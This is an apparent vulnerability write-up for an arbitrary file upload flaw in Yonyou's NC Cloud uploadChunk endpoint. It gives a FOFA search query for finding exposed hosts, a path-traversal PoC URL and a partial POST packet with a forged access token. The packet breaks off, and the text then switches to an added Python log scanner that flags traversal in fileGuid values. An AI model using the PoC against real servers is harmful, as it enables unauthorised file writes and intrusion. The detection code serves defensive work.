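Introduction
NC Cloud is a digital platform for large enterprises from Yonyou. It supports flexible deployment as public cloud, hybrid cloud or dedicated cloud. The product's uploadChunk file has an arbitrary file upload vulnerability.
Vulnerability reproduction
FOFA query: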
app="用友-NC-Cloud"
The page looks like this when accessed:
POC:/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1
POST request packet:
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 149
Content-Type: multipart/form-data; boundary=bd966ad8118cfcc67ee341272f2900c4

--bd966ad8118cfcc67ee341272f2900c4
Content-Disposition: form-data; name="file"; filename="text.txt"
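
On the defensive side, requests of this shape can be found in web access logs by checking the fileGuid parameter of uploadChunk requests for path characters. The Python code below is an added example, not part of the original write-up or of the product. It assumes combined-format access logs from a proxy in front of NC Cloud and that legitimate fileGuid values never contain `..`, `/` or `\`; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

UPLOAD_PATH = "/ncchr/pm/fb/attachment/uploadchunk"  # endpoint from the PoC, lowercased
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are reduced to plain text."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_guid(target):
    """Return the decoded fileGuid when an uploadChunk request carries path
    characters in it, otherwise None."""
    parts = urlsplit(target)
    if fully_decode(parts.path).lower().rstrip("/") != UPLOAD_PATH:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)
        if key.lower() == "fileguid" and re.search(r"\.\.|[/\\]", value):
            return value
    return None

def scan(lines):
    """Return (line number, method, decoded fileGuid) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if match:
            guid = suspicious_file_guid(match.group("target"))
            if guid is not None:
                hits.append((number, match.group("method"), guid))
    return hits

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1" 200 31',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=3f2a9c1e-5b7d-4e8a-9c0f-1a2b3c4d5e6f&chunk=1&chunks=4 HTTP/1.1" 200 31',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /ncchr/pm/fb/attachment/uploadChunk?chunk=1&fileGuid=%2F..%2F..%2F..%2Fnccloud%2F&chunks=1 HTTP/1.1" 200 31',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that a request with a path-like fileGuid reached the server; the response code and the files present under the web root still need to be checked to decide whether a write succeeded.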